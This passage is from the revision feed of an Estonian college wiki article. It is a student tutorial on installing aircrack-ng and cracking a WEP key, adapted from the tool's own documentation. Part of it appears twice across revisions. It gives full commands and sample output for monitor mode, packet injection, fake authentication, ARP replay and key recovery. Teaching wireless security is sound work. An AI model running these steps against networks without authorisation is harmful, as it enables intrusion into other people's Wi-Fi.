&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode&lt;br /&gt;
&lt;br /&gt;
]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89324</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89324"/>
		<updated>2015-05-25T19:48:50Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Eesmärk */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode&lt;br /&gt;
&lt;br /&gt;
]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89323</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89323"/>
		<updated>2015-05-25T19:47:13Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
